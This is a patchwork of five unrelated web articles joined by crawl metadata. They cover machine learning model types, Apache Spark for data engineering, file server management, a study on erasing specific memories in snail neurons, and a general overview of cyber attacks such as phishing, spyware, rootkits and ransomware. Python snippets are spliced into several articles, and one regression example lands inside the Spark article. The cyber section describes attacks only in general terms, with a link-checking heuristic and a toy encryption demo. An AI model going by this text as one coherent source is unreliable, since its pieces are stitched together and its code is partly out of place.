As organizations look to develop their analytics maturity and use advanced analytics such as predictive analytics, machine learning has proven to be an instrumental tool. But not all machine learning is created equal: there are different models you can deploy for different use cases. In this blog, we will discuss the most common types of machine learning and how they work. We'll also cover the different ways you can train your machine learning models to help your business remain agile and become more competitive, as well as best practices to get started.

What Are the Different Types of Machine Learning?

The two most common types of machine learning are supervised and unsupervised.

Supervised learning uses labeled data (data that comes with a tag such as a name, type, or number) and guided learning to train models to classify data or to make accurate predictions. It is the simpler of the two types of machine learning, the most commonly used, and the most accurate, because the learning is guided using known historical targets.

Unsupervised learning, on the other hand, uses unlabeled data (data that does not come with a tag) to make predictions. It uses artificial intelligence algorithms to identify patterns in datasets and doesn't have any defined target variable.
Unsupervised learning can perform more complex tasks than supervised learning, but it's also less accurate in its predictions.

Both types of machine learning are used to train machine learning models. There are numerous types of models you can build, and depending on the type of problem you have, you can use more than one model to help make your predictions.

What Are Machine Learning Models and How Do They Work?

Machine learning models are a representation of what a system has learned. They are trained to take input data, recognize patterns in that data, make a prediction based on it, and then provide an output. There are various types of machine learning models, and some overlap in how they work. Common machine learning models include:

Regression is a type of supervised learning and is used to predict a numeric value. Typical use cases for a regression model include things like predicting sales volume or weather forecasting. Examples of questions a regression model can answer include:
- How will stocks perform next quarter?
- What will the temperature be in Chicago next week?
- How much of this product will we sell this year?

Classification is also considered supervised learning and works to sort data into groups. Classification models rely on existing labeled target data and related independent variables to predict which groups new data belong to. Typical use cases for a classification model include language or pattern detection, as well as fraud detection. Examples of questions a classification model can answer include:
- Is this flower a rose or a tulip?
- Are our customers satisfied or dissatisfied?
- Is this review positive or negative?

Association rule mining is a type of unsupervised learning and is used to infer associations among data points. Association rule mining models help you understand the association between one variable and another, and the relevance of that association.
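These association strengths are typically quantified by two numbers: support (how often an itemset appears) and confidence (how often the consequent appears given the antecedent). As a library-free sketch over made-up shopping baskets (the data and item names are purely illustrative):

```python
# Toy transaction data: each basket is a set of purchased items.
baskets = [
    {"diapers", "beer", "chips"},
    {"diapers", "beer"},
    {"diapers", "milk"},
    {"bread", "beer"},
]

def support(itemset):
    """Fraction of baskets containing every item in itemset."""
    return sum(itemset <= basket for basket in baskets) / len(baskets)

def confidence(antecedent, consequent):
    """Of baskets with the antecedent, the fraction that also have the consequent."""
    return support(antecedent | consequent) / support(antecedent)
```

Here confidence({diapers} → {beer}) comes out to about 0.67: two of the three diaper baskets also contain beer, which is exactly the "are diaper buyers likely to buy beer?" question.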
Typical use cases for association rule mining models include medical diagnosis, customer behavior analysis, and user behavior on a website. Examples of questions an association rule mining model can answer include:
- If customers purchased a bike, are they likely to purchase accessories?
- Are customers likely to buy beer if they buy diapers?
- What's the probability of the occurrence of an illness given other symptoms or comorbidities?

Clustering is most commonly used in unsupervised learning but can also be used in supervised learning. It is used to group similar things together, as well as to detect anomalies. Typical use cases for a clustering model include customer segmentation, identifying behavior patterns, and detecting defects. Examples of questions a clustering model can answer include:
- What genre of movies will this customer watch?
- Which customers will likely purchase accessories?
- Will this individual participate in fraudulent activity?

Neural networks are non-linear statistical data modeling tools and are leveraged in deep learning by processing training data much the way a human brain would. Neural networks can be used for prediction, classification, association mining, or clustering. Typical use cases for neural network models include image, audio, and video recognition, but they can also be leveraged in typical business use cases. Examples of questions a neural network model can answer include:
- What is the likelihood of my electronic device failing?
- Are my manufacturing machines functioning properly?
- What are the issues causing a breakdown in my manufacturing processes?

How Can Machine Learning Make Your Business Agile and Competitive?

You may have great data analysts, but it's difficult to capture the knowledge an individual might have and then be able to repeat it. It's also difficult to capture all the possibilities that can contribute to a prediction with just the human eye.
Your data analyst can look at the same three data points every week and pull that information into a regression model to predict what sales are going to look like this quarter. But what if there's more to it? Humans are good at detecting patterns, but nowhere near as good as a machine.

Machine learning allows you to learn from many features and then make that learning a repeatable process. Machine learning not only helps organizations understand and anticipate customer needs and act accordingly; it can also help analyze and improve business processes and product development, as well as fine-tune employee recruitment and retention efforts. The sky's the limit in terms of how machine learning can be leveraged.

Understanding how each type of machine learning model works and how it can be used is a start, but ultimately you want to make your learnings a repeatable process so that you can remain agile and competitive.

What Are Best Practices to Get Started with Building Machine Learning Models?

As you look to get started with machine learning, it's key to understand that the goal isn't just to get answers to questions right now, but to make sure the answers are as accurate as possible and that the process is repeatable and can evolve. It's a long-term goal that requires some work upfront, but ultimately the results will allow your business to meet its goals and keep pace with the market. Here are some key best practices to follow before starting with machine learning:

1.) Machine learning is part of data science. Before you begin to build machine learning models, you need to make sure the quality of your data is high. That involves getting your data organized, cleaned, profiled, and prepared for feature engineering. Without high-quality data, you're not likely to get good user adoption.
You're also likely to increase the risk to your company and the likelihood that your data will be bad in the future.

2.) Don't skip diagnostic analytics in the analytics maturity model. Most businesses doing analytics are doing descriptive analytics. From there, they jump to predictive analytics, which is where machine learning comes into play. But the step in between, diagnostic analytics, is sometimes overlooked. Diagnostic analytics helps you understand the "why" behind your data, which helps you build better, more interpretable machine learning models, because you already know what's going into them.

3.) Leverage business intelligence (BI) tools to enhance interpretability and communication. While you can design visuals using Python or R, sharing content with end users can be tricky. We find that best practice involves utilizing existing BI tools, such as Power BI, Tableau, or Qlik Sense, to communicate the results of the machine learning. Including how and why a model works in a visual also helps with interpretability and avoids data science in a "black box." Additionally, using familiar, highly interactive tools allows for easier access, wider adoption, and even discovery of new use cases.

4.) Make sure to consider model monitoring after operationalizing machine learning into your processes. Models can incur data drift (change in model input data that leads to model performance degradation) over time, potentially providing wrong answers or making the model irrelevant. A plan to monitor the model, maintain the inputs, and revisit what you're targeting helps ensure the continued quality and success of any machine learning effort.

5.) Staff accordingly. Data science is a team sport. You not only need data scientists; don't forget to include data engineers, analysts, and subject matter experts in your staffing plans.
Having the right people involved can make all the difference. And if you need to supplement data scientists, there is a lot of software out there to help with autoML, such as DataRobot. | <urn:uuid:deb1c739-58da-44cd-8203-568ff2d2d3a4> | CC-MAIN-2022-40 | https://www.analytics8.com/blog/what-are-the-different-types-of-machine-learning-you-can-deploy-and-how-do-you-use-them/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334992.20/warc/CC-MAIN-20220927064738-20220927094738-00316.warc.gz | en | 0.945351 | 1,914 | 3.21875 | 3 |
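To ground the earlier discussion of regression, here is a minimal supervised example: fitting a one-variable line by ordinary least squares in plain Python, then predicting a numeric value for an unseen input. The numbers are made up, and a real project would use a library such as scikit-learn rather than hand-rolled math:

```python
def fit_line(xs, ys):
    """Ordinary least squares for y = slope * x + intercept."""
    n = len(xs)
    mx, my = sum(xs) / n, sum(ys) / n
    slope = (sum((x - mx) * (y - my) for x, y in zip(xs, ys))
             / sum((x - mx) ** 2 for x in xs))
    return slope, my - slope * mx

def predict(model, x):
    """Apply a fitted (slope, intercept) model to a new input."""
    slope, intercept = model
    return slope * x + intercept

# e.g. quarter number (x) vs. units sold (y), purely illustrative
model = fit_line([1, 2, 3, 4], [12, 19, 31, 38])
```

With this toy data the fit works out to a slope of 9.0 and an intercept of 2.5, so `predict(model, 5)` returns 47.5 — the "how much will we sell next quarter?" style of question from the regression section.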
BrandPosts are written and edited by members of our sponsor community. BrandPosts create an opportunity for an individual sponsor to provide insight and commentary from their point-of-view directly to our audience. The editorial team does not participate in the writing or editing of BrandPosts.
By Don Wake
Data engineering, as a separate category of expertise in the world of data science, did not occur in a vacuum. The role of the data engineer originated and evolved as the number of data sources and data products ballooned over the years. Therefore, the role and function of a data engineer is closely associated with a variety of different data-processing platforms such as Apache Hadoop, Apache Spark, and a huge number of specialized tools. In this article, you will find out why Spark should be considered the data engineer’s best friend.
Spark is the ultimate toolkit
Data engineers often work in multiple, complicated environments and perform the complex, difficult, and, at times, tedious work necessary to make data systems operational. Their job is to get the data into a form where others in the data pipeline, like data scientists, can extract value from the data.
Spark has become the ultimate toolkit for data engineers because it simplifies the work environment by providing both a platform to organize and execute complex data pipelines, and a set of powerful tools for storing, retrieving, and transforming data.
Spark doesn’t do everything, and there are lots of important tools outside of Spark that data engineers love. But what Spark does is perhaps the most important thing: It provides a unified environment that accepts data in many different forms and allows all the tools to work together on the same data, passing a data set from one step to the next. Doing this well means you can create data pipelines at scale.
With Spark, data engineers can:
Connect to different data sources in different locations, including cloud sources such as Amazon S3, databases, Hadoop file systems, data streams, web services, and flat files.
Convert different data types into a standard format. The Spark data processing API accepts many different types of input data. Spark then utilizes Resilient Distributed Datasets (RDDs) and DataFrames for simplified yet advanced data processing.
Write programs that access, transform, and store the data. Many common programming languages have APIs to integrate Spark code directly, and Spark offers many powerful functions for performing complex ETL-style data cleaning and transformation functions. Spark also includes a high-level API that allows users to seamlessly write queries in SQL.
Integrate with almost every important tool for data wrangling, data profiling, data discovery, and data graphing.
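PySpark's DataFrame API is the natural way to express such pipelines; as a dependency-free illustration of the same extract-clean-aggregate shape (records and field names invented for the example, not any real dataset), the logic reduces to:

```python
# Raw "extracted" records, deliberately messy, as an ETL input often is.
raw = [
    {"name": " Ada ", "dept": "eng", "salary": "101000"},
    {"name": "Grace", "dept": "eng", "salary": "not-a-number"},
    {"name": "Linus", "dept": "ops", "salary": "90000"},
]

def clean(rec):
    """Normalize one record; return None to drop malformed rows."""
    try:
        return {"name": rec["name"].strip(),
                "dept": rec["dept"],
                "salary": int(rec["salary"])}
    except ValueError:
        return None

cleaned = [r for r in map(clean, raw) if r is not None]

by_dept = {}                 # a groupBy-style aggregation step
for r in cleaned:
    by_dept.setdefault(r["dept"], []).append(r["salary"])
avg_salary = {d: sum(v) / len(v) for d, v in by_dept.items()}
```

In Spark the same map/filter/groupBy steps would run as distributed transformations over a DataFrame instead of in-memory lists; the shape of the pipeline is what carries over.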
What makes Spark unique
In order to understand why Spark is so special, it is important to compare it to the Hadoop infrastructure, which was crucial earlier in the rise of big data and big data analytics.
It's modular: Spark is essentially a modular toolkit initially designed to work with Hadoop via the YARN cluster manager interface. This pairing with Hadoop made sense, as Hadoop provided both the compute and storage resources: Spark offered many tools for processing data, and Hadoop handled large volumes of affordable persistent storage and the scaling of compute and storage nodes. It quickly became apparent, however, that coupling compute and storage together wasn't cost effective. Since then, many efficiencies have been introduced to support cloud-scale architectures, all in an attempt to decouple storage and compute. Spark is a valuable tool that can be used outside of Hadoop, allowing either resource to scale independently. Ultimately, this means that regardless of an organization's favorite storage and compute infrastructure, Spark empowers users to interface with it.
Accepts data of any size and form: Spark emerged 10 years after Hadoop’s creation and was more focused on how data of any size could be combined to support the development of applications and analytical workloads. While Hadoop offered a variety of low-level capabilities, Spark provides a much broader and tailor-made environment that takes raw materials, turns them into reusable forms, and delivers them in analytic workloads. While Spark can work in a batch fashion, it can also work in an interactive fashion. As a result, Spark has become the go-to platform for most data applications and is especially well tailored to solving the problems of data engineering. Essentially, Spark outgrew Hadoop.
Supports multiple approaches and users: The Hadoop infrastructure ushered in the era of big data by creating a platform that could creatively and affordably store and process data at quantities never previously imagined, and then make that data usable through MapReduce. But Spark was created to support the processes further up the stack as well. While Spark can access raw forms of data and interact with Hadoop file systems, it isn't a single paradigm for achieving these aims; instead, it was built from the ground up to provide multiple processing architectures that use the same underlying data format.
Designed for the data engineer
Spark offers data engineers a large amount of elasticity and flexibility when approaching their work. For example, a TensorFlow job in Spark can access data in HDFS or multiple formats. Since Spark utilizes an API-driven approach, Spark engineers have a wide variety of tools to use with Spark as the analytics engine. This modularity enables use of open-source tools and avoids vendor lock-in with bespoke application-specific programming tools.
Since Spark now works with Kubernetes and containerization, engineers can spin up and spin down Spark clusters and manage them efficiently as Kubernetes pods versus relying on physical, standalone or bare-metal clusters. Deploying a Spark cluster on top of a Kubernetes cluster leverages the hardware abstraction layer managed by Kubernetes. This further frees up a data engineer to do data engineering and avoid the complex and often time-consuming work of IT administration and cluster management.
Spark is a tool that was created to not only solve the problem of data engineering, but also be accessible and helpful to the people who are further down the data pipeline. Thus, while Spark was designed for data engineers, it is actually increasing the number of people who can get value out of data. By offering scalable compute with scalable toolsets, Spark empowers engineers to empower others to leverage data to the fullest. Perhaps, then, not only is Spark a data engineer’s best friend — but is everybody’s best friend?
Don has spent the past 20 years building, testing, marketing, and selling enterprise storage, networking, and compute solutions in the rapidly evolving information technology industry. Today, his focus is on HPE Ezmeral: the ultimate toolkit to manage, deploy, execute, and monitor data-centric applications on software- and hardware-based architectures in the cloud, on premises, and at the edge. | <urn:uuid:06961e04-e9dd-43b3-ba88-da2a2ff64fa3> | CC-MAIN-2022-40 | https://www.cio.com/article/189412/spark-a-data-engineer-s-best-friend.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334992.20/warc/CC-MAIN-20220927064738-20220927094738-00316.warc.gz | en | 0.936004 | 1,426 | 2.59375 | 3 |
True work revolves around the access and modification of files, and what better way to store and distribute work files than through a file server? The central-access model for storing and managing files brings many benefits to an organization. Most importantly, everyone can access a single, accurate version of any file on the server. Easy as that sounds, this feat is only possible with proper file server management.
This post explores the concept of file server management from both a how-to and best practice standpoint. To set a solid foundation for the discussion, we’ll need a universal definition for file server management. This way, every other argument builds on the knowledge needed to implement a file server.
What Is File Server Management?
File server management involves the upkeep of the hardware and software components of a central storage resource in a network. Usually, we invest all our focus on the actual file storage in an operating system. However, because the term "file server" also refers to the physical machine on which the files live, neglecting the hardware's health is (eventually) detrimental to the health of any objects it stores.
With the hardware consideration out of the way, let's turn our attention to the software aspect of file server management. Many software products exist to help server administrators with file server management. Realistically, a file server exists as part of an overall business network that includes other types of servers (application, print, database, etc.). This places file servers squarely within a DevOps engineer's domain.
Being in charge of a file server means ensuring not only that it performs its operations efficiently, but also that it fits seamlessly into the bigger picture. To paint a crystal-clear picture of what such a management role entails, let's compare how maintaining file servers differs from maintaining other kinds of servers.
Managing File Servers vs. Other Kinds of Servers
Unlike other kinds of servers (see list below), file servers act solely as the static storage location of files on a network. Yes, new files get added to the server regularly, but compared to application servers, the major intent with file servers is to have a silo of work files. Reasons for this include safekeeping in case of damage, and the facilitation of collaboration on contained files.
Now for a review of other types of servers.
A central print task management and scheduling machine removes the need for printers next to every workstation. The difference between a print server and a file server is that a print server never actually stores files. Rather, it queues tasks from print requests along with details of the files to print. After a print job executes, you cannot access the file as you would on a file server.
These are high-performance machines that execute applications on behalf of client nodes. They remove the need to install and run separate instances of applications on workstations across a network. While they may connect to file servers to ease the burden of drive space management, their task is to host active, executable files (such as compiled code). A good example of an application server is one that hosts a central instance of an antivirus application that protects all machines on a network.
These types of servers are information silos that arrange data into relations (tables) to facilitate access through queries as reports. Typically, a database management system (such as Microsoft SQL Server) handles the access/update activities of a database server. Some database types can store file objects. However, the fundamental difference between them is that file servers only store actual files in their original forms, not in tables.
You’ll find proxy servers between client-server networks managing requests while adding a layer of security by cutting direct contact between network components. Smart proxies route requests to the nearest or best resolution destinations.
A subcategory of application server types, mail servers host email communication services (and configurations) and remove the load of storing, sending, and pulling emails to and from destination addresses.
Some file servers extend web servers as resource locations. In this scenario, we’d find media files (pictures, videos, etc.) along with documents that web applications query and update repeatedly. Note that no source code files execute from within file servers. Otherwise, they’d double as web application servers.
Apart from a file server management software service installed on the file server, no applications run on it (or from it) for remote access. If applications’ binaries live on the file server, it simply acts as a download server rather than an application server.
File Server Management Best Practices
While managing file servers, the following best practices make for smooth access and update activities.
1. Maintain a Strict Permissions Policy
Permissions determine how far an individual user or department can go in accessing and altering the state of a folder or any individual object on a file server. As a general rule, users should not have full access to the entire file server's assets. Full access would imply the ability to view, edit, and delete existing files, and it also extends to creating new objects on the file server.
Without a strict permissions policy, a server is barely secure. This exposes sensitive files to unintended deletion and unauthorized copying (potential leaks). Each user should have the least possible permissions on the server and its files. This way, their productivity is unhindered, while security is not compromised on their behalf.
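As a toy model of the least-privilege rule, consider a mapping from roles to the minimal operations they need, with everything else denied by default. Role names, paths, and operations here are hypothetical, not any product's permission scheme:

```python
# Each role grants only the (path, operation) pairs it strictly needs.
PERMISSIONS = {
    "finance":  {("/finance", "read"), ("/finance", "write")},
    "everyone": {("/shared", "read")},
}

def allowed(roles, path, op):
    """Deny unless some role of the user explicitly grants (path, op)."""
    return any((path, op) in PERMISSIONS.get(r, set()) for r in roles)
```

The important property is the default: an operation nobody thought to grant is automatically refused, rather than automatically permitted.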
2. Establish a Regular Backup Strategy
Backups are static historic records of the state of files on a server—a snapshot, if you will, of the entire file server. They’re crucial restarting points when servers unexpectedly fail. The more backups you conduct within a time frame, the closer to the latest (unsaved) state your restarting point will be.
Establish and adhere to a regular backup strategy to avoid losing valuable work hours to server failures. Typically, daily backups should suffice, run when there's little to no traffic to the server (after work hours), with cyclical incremental backups done weekly.
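The incremental half of such a strategy boils down to "copy only what changed since the last run." Here is a simplified sketch using file modification times as the change signal; a real tool would also verify copies, handle deletions, and rotate old snapshots:

```python
import os
import pathlib
import shutil

def incremental_copy(src, dst, last_run):
    """Copy files under src whose mtime is newer than last_run (a POSIX timestamp).

    Directory structure is mirrored under dst; unchanged files are skipped.
    Returns the names of the files that were copied.
    """
    copied = []
    for f in sorted(src.rglob("*")):
        if f.is_file() and f.stat().st_mtime > last_run:
            target = dst / f.relative_to(src)
            target.parent.mkdir(parents=True, exist_ok=True)
            shutil.copy2(f, target)   # copy2 preserves timestamps/metadata
            copied.append(f.name)
    return copied
```

Each weekly cycle would record its own run time, so the next incremental pass only picks up files modified since then.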
3. Implement a “File Recovery” Strategy Early
Backups are, to some extent, a file recovery strategy. However, more advanced file recovery methods should be in place at an early stage of your file server’s life cycle. Typically, these are part and parcel of larger server management software offerings. Building your file server around server management software is a holistic approach that aids with scaling and maintaining file health.
4. Group Your Files Wisely
File grouping goes hand in hand with permissions and access management. Having departmental partitions is a good start. However, work cross-access into any grouping strategy so that users who need access to those work files have it. In the same light, seclude sensitive files from the rest of the server’s contents, regardless of which group they originate from.
5. Conduct Regular Audits of the Entire Server
Implement an iterative health audit to ensure the smooth functioning of your file server. With this said, it helps if the server management suite you’re using provides dashboards for full visibility into your server and its objects. This way, you have a single source of truth into the state of files and the server (both soft and hardware elements).
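A basic audit pass can also be scripted: walk the share, tally disk usage per file type, and flag risky permissions. This sketch flags world-writable files as one example signal; the checks a real server management suite performs would be far broader:

```python
import os

def audit(root):
    """One audit pass: per-extension disk usage plus world-writable files."""
    usage, flagged = {}, []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.stat(path)
            ext = os.path.splitext(name)[1] or "<none>"
            usage[ext] = usage.get(ext, 0) + st.st_size
            if st.st_mode & 0o002:          # world-writable bit set
                flagged.append(path)
    return usage, flagged
```

Run on a schedule and fed into a dashboard, even a simple pass like this gives the single source of truth into the server's contents that the audit practice calls for.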
File servers provide a smart abstraction of business assets from the workstations that modify them in the name of work. The effective management of file servers requires intentional effort. Part of the activities and best practices necessary for the upkeep of file servers includes regular backups, frequent health audits, and the enforcement of a strict permissions policy.
Depending on the scale of your file server, the practices suggested herein may be easier said than done. However, including a server management partner, such as Netreo, in your strategy goes a long way toward making short work of file server management.
This post was written by Taurai Mutimutema. Taurai is a systems analyst with a knack for writing, which was probably sparked by the need to document technical processes during code and implementation sessions. He enjoys learning new technology and talks about tech even more than he writes. | <urn:uuid:16e24b47-7cbb-4849-94d1-6675be4fa93f> | CC-MAIN-2022-40 | https://www.netreo.com/blog/file-server-management/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335396.92/warc/CC-MAIN-20220929225326-20220930015326-00316.warc.gz | en | 0.922469 | 1,692 | 2.53125 | 3 |
Different types of memories stored in the same neuron of the marine snail Aplysia can be selectively erased, according to a new study by researchers at Columbia University Medical Center (CUMC) and McGill University and published today in Current Biology.
The findings suggest that it may be possible to develop drugs to delete memories that trigger anxiety and post-traumatic stress disorder (PTSD) without affecting other important memories of past events.
During emotional or traumatic events, multiple memories can become encoded, including memories of any incidental information that is present when the event occurs.
In the case of a traumatic experience, the incidental, or neutral, information can trigger anxiety attacks long after the event has occurred, say the researchers.
“The example I like to give is, if you are walking in a high-crime area and you take a shortcut through a dark alley and get mugged, and then you happen to see a mailbox nearby, you might get really nervous when you want to mail something later on,” says Samuel Schacher, PhD, a professor of neuroscience in the Department of Psychiatry at CUMC and co-author of the paper.
In the example, fear of dark alleys is an associative memory: it provides useful information based on a previous experience.
Fear of mailboxes, however, is an incidental, non-associative memory that is not directly related to the traumatic event.
“One focus of our current research is to develop strategies to eliminate problematic non-associative memories that may become stamped on the brain during a traumatic experience without harming associative memories, which can help people make informed decisions in the future — like not taking shortcuts through dark alleys in high-crime areas,” Dr. Schacher adds.
Brains create long-term memories, in part, by increasing the strength of connections between neurons and maintaining those connections over time. Previous research suggested that increases in synaptic strength in creating associative and non-associative memories share common properties.
This suggests that selectively eliminating non-associative synaptic memories would be impossible, because for any one neuron, a single mechanism would be responsible for maintaining all forms of synaptic memories.
The new study tested that hypothesis by stimulating two sensory neurons connected to a single motor neuron of the marine snail Aplysia; one sensory neuron was stimulated to induce an associative memory and the other to induce a non-associative memory.
By measuring the strength of each connection, the researchers found that the increase in the strength of each connection produced by the different stimuli was maintained by a different form of a Protein Kinase M (PKM) molecule (PKM Apl III for associative synaptic memory and PKM Apl I for non-associative).
They found that each memory could be erased — without affecting the other — by blocking one of the PKM molecules.
In addition, they found that specific synaptic memories may also be erased by blocking the function of distinct variants of other molecules that either help produce PKMs or protect them from breaking down.
The researchers say that their results could be useful in understanding human memory because vertebrates have similar versions of the Aplysia PKM proteins that participate in the formation of long-term memories.
In addition, the PKM-protecting protein KIBRA is expressed in humans, and mutations of this gene produce intellectual disability.
“Memory erasure has the potential to alleviate PTSD and anxiety disorders by removing the non-associative memory that causes the maladaptive physiological response,” says Jiangyuan Hu, PhD, an associate research scientist in the Department of Psychiatry at CUMC and co-author of the paper.
“By isolating the exact molecules that maintain non-associative memory, we may be able to develop drugs that can treat anxiety without affecting the patient’s normal memory of past events.”
“Our study is a ‘proof of principle’ that presents an opportunity for developing strategies and perhaps therapies to address anxiety,” said Dr. Schacher.
“For example, because memories are still likely to change immediately after recollection, a therapist may help to ‘rewrite’ a non-associative memory by administering a drug that inhibits the maintenance of non-associative memory.”
Future studies in preclinical models are needed to better understand how PKMs are produced and localized at the synapse before researchers can determine which drugs may weaken non-associative memories.
Materials provided by Columbia University Medical Center.
- Jiangyuan Hu, Larissa Ferguson, Kerry Adler, Carole A. Farah, Margaret H. Hastings, Wayne S. Sossin, Samuel Schacher. Selective Erasure of Distinct Forms of Long-Term Synaptic Plasticity Underlying Different Forms of Memory in the Same Postsynaptic Neuron. Current Biology, 2017. DOI: 10.1016/j.cub.2017.05.081
How Every Cyber Attack Works – A Full List
Which of these cyber attacks will hack you?
You must have heard it on the news: “Country X accuses country Y of launching a cyberattack against its infrastructure” or “Huge leak at Corporation X: account information of millions of users exposed”. Sometimes, you don’t even need to hear it on the news; instead, it is right there, plastered all over your computer screen: “Your information has been encrypted, and the only way to recover it is to pay us”. All of these are cyber attacks.
What is a cyber attack?
Cyber attacks are malicious Internet operations launched mostly by criminal organizations looking to steal money, financial data, intellectual property or simply disrupt the operations of a certain company. Countries also get involved in so-called state-sponsored cyberattacks, where they seek to learn classified information on a geopolitical rival, or simply to “send a message”. The global cost of cybercrime for 2015 was $500 billion. That’s more than 5 times Google’s yearly cash flow of $90 billion. And that number is set to grow tremendously, to around $2 trillion by 2019. In this article, we want to explore the types of attacks cybercriminals use to drive up such a huge figure, and also help you understand how they work and how they affect you.
Quick links for navigation
- Cyber fraud
- Malware attacks
- Social Engineering Attacks
- Technical attacks
- Vulnerability Exploitation
- Login Attacks
- Malicious content
- Groups that launch cyber attacks
During a standard phishing attack, a malicious hacker tries to trick the victim into believing he is trustworthy, so that the victim performs a certain action. The most famous of these is the “Nigerian prince” scam. In case you haven’t heard of it, the malicious hacker claims to be a wealthy Nigerian who requires your help in transferring tens of millions of dollars out of his home country. As a reward for your service, the “prince” will send you a hefty sum of money. All you have to do is to provide him with some personal information (we’ll explain why they need this info later on) and a small fee to process the money transfer, and you’re rich for life! Of course, it’s all a scam. There is no Nigerian prince or tens of millions of dollars. The only real money in the scheme is the “processing fee” you provide, and there are no refunds from malicious hackers. To maximize the number of infected users, they send out thousands, or even hundreds of thousands, of phishing emails.
Spear phishing attacks
Regular phishing attacks are massive spam campaigns, where the malicious hacker hopes that as many people as possible click the link/install the attachment. Spear phishing on the other hand is much more targeted. It involves personalizing the phishing email around the receiver. Here are some examples:
- The phishing email is designed to look like it came from a bank (or another type of trusted entity). Due to some technical issues or any other reason, they ask you to reenter the login information for your bank account. But the form you type your login info into belongs to the malicious hacker, who can now clean out your bank account.
- You get a fake email disguised as a Gmail/Yahoo/Outlook email, which requires you to reenter your login information to confirm “it’s really you”. Some cheeky cybercriminals might even say someone else tried to log in to your account. This is the method used in one of the most high-profile hackings of recent years.
- A fake email from a manager/CEO about important company files. In such cases, the spear-phishing email will contain a malware infected Excel/Word file that once opened will unleash a malware attack on your PC. In these cases, the hacker is more interested in the company’s data, not your own (that’s why it’s called the CEO fraud).
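Mail filters catch many of these tricks by checking where a link actually points. Here is a deliberately crude Python sketch of that idea; the trusted domains and the digit-substitution rule are made-up illustrations, not a production filter:

```python
import re
from urllib.parse import urlparse

# Domains this user genuinely logs in to (illustrative, not a real list).
TRUSTED_DOMAINS = {"mybank.com", "gmail.com"}

def looks_like_phishing(url):
    """Crude heuristic: flag lookalike or deceptive login links."""
    host = urlparse(url).hostname or ""
    if host in TRUSTED_DOMAINS:
        return False
    # A trusted name buried inside an unrelated domain, e.g. mybank.com.evil.net
    if any(t in host and not host.endswith(t) for t in TRUSTED_DOMAINS):
        return True
    # Digit-for-letter substitutions such as "paypa1" or "g0ogle"
    if re.search(r"[a-z][0-9]", host):
        return True
    return False
```

Real filters combine dozens of signals (sender reputation, link age, content analysis), but the underlying logic is the same: does the link really go where it claims to?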
Involuntary disclosure happens whenever a company or organization reveals personal information about you without asking for your authorization, for instance when a medical provider leaks your personal health information.
Whaling is a more refined version of phishing. This time around, a malicious hacker targets a specific, high-value person, such as the CEO of a company or a high-ranking politician. In order to carry out a whaling attack, the malicious hacker gathers as much information about the target as possible, such as details about friends, occupation, passions, hobbies and so on, just so the victim has a higher chance of clicking the link or opening the attachment. Whaling is a niche pursuit for cybercriminals, but a highly profitable one. Companies lost nearly $2.3 billion over a 3-year period due to whaling attacks targeting CEOs.
Malware attacks and infections
Most frequently, malware attacks are delivered as malicious attachments to a phishing email or through downloads on suspicious spam websites. The infection takes place the moment you open up the attachment to see what it’s really about. In other, rarer instances, it’s possible for the malware to be downloaded on your PC without you even approving of it. These are called drive-by-downloads and are worth their own, separate discussion.
Some types of malware try to stay as hidden as possible, while quietly collecting valuable information about you in the background. Online attackers use spyware to find out deeply personal information such as passwords, credit card data and personal photos. Keyloggers and form-grabbing malware are both included in this category. In order to remove them, you’ll usually require good antivirus or malware removal software. Advertisers, on the other hand, look for information related to your internet usage habits, such as location, search history, hobbies and interests, in order to better target you with ads. Spyware from advertisers usually comes with free software such as browser toolbars and music programs, which arrive either stand-alone or bundled with another program. While not as bad as the first category, this type of spyware still limits your privacy and comes with vulnerabilities of its own. Fortunately, a simple uninstall should be sufficient to remove it from your computer.
Rootkits are malware that infects your PC on a deeper level, in order for them to be undetectable. Computers are structured in layers. A program can only modify other software from the same layer or above, but not from a deeper one since it doesn’t have access. For instance, a program like Excel, Photoshop or Word aren’t able to modify underlying software such as the software drivers for graphic cards or sound cards. The deepest layer is the BIOS, which controls a PC’s boot-up procedure and other software aspects. Rootkits usually target this access layer since an antivirus program has a very difficult time finding and removing the rootkit. Rootkits can enslave computers into a botnet, listen in on a user’s internet traffic, or make other types of malware undetectable. It’s safe to say they are the worst type of malware infection out there.
Most people think that virus = malware. But that’s not actually the case. A virus is a type of malware. In other words, all viruses are malware, but not all malware are viruses. A virus is a type of malware that can spread and infect other computers, hence the name virus. A single computer can spread a virus in a whole network, usually by infecting other files that are then shared to the rest of the network.
Trojan horse malware
Named after the famed wooden horse used to conquer Troy, Trojan malware infects your PC by making you think they are a completely different sort of program. For instance, the program might claim to be antivirus software but is actually a keylogger or spyware in disguise.
The most widespread types of ransomware encrypt all or some of the data on your PC, and then ask for a large payment (the ransom) in order to restore access to your data. This type of malware has experienced a wild surge in popularity, in large part thanks to anonymous cryptocurrencies such as Bitcoin.
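To see why victims can’t simply “undo” the encryption, here is a toy Python illustration. It uses a simple SHA-256-derived keystream purely for demonstration (real ransomware uses far stronger hybrid cryptography), and the point is that the key lives only with the attacker:

```python
import hashlib

def keystream(key, length):
    """Derive a pseudorandom keystream from `key` (toy construction only)."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + counter.to_bytes(8, "big")).digest()
        counter += 1
    return out[:length]

def xor_encrypt(data, key):
    """XOR the data with the keystream; the same call decrypts."""
    ks = keystream(key, len(data))
    return bytes(a ^ b for a, b in zip(data, ks))

plaintext = b"quarterly-report.xlsx contents"
ciphertext = xor_encrypt(plaintext, b"attacker-secret")

# With the attacker's key, the data comes back; without it, it's noise.
assert xor_encrypt(ciphertext, b"attacker-secret") == plaintext
assert xor_encrypt(ciphertext, b"wrong-guess") != plaintext
```

Since guessing a properly sized key is computationally infeasible, the only reliable defenses are offline backups, or never getting infected in the first place.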
A botnet is a network of infected computers that are enslaved to a single command & control center. The computers in a botnet act in unison, so that they all do the same thing simultaneously. Malicious hackers use botnets for some of the most nefarious cybercrimes out there, such as DDoS attacks, mass Bitcoin mining, or gathering user data.
Time bombs and logic bombs
Time bombs and logic bombs are malicious code hidden within programs or network systems. They activate and launch a malware attack either at a certain time, in case of time bombs, or when certain conditions are met, in case of logic bombs. Attackers use logic bombs in multiple ways, such as deleting databases, preventing the deletion of corrupted code, or sending valuable information about the victim back to the malicious hacker.
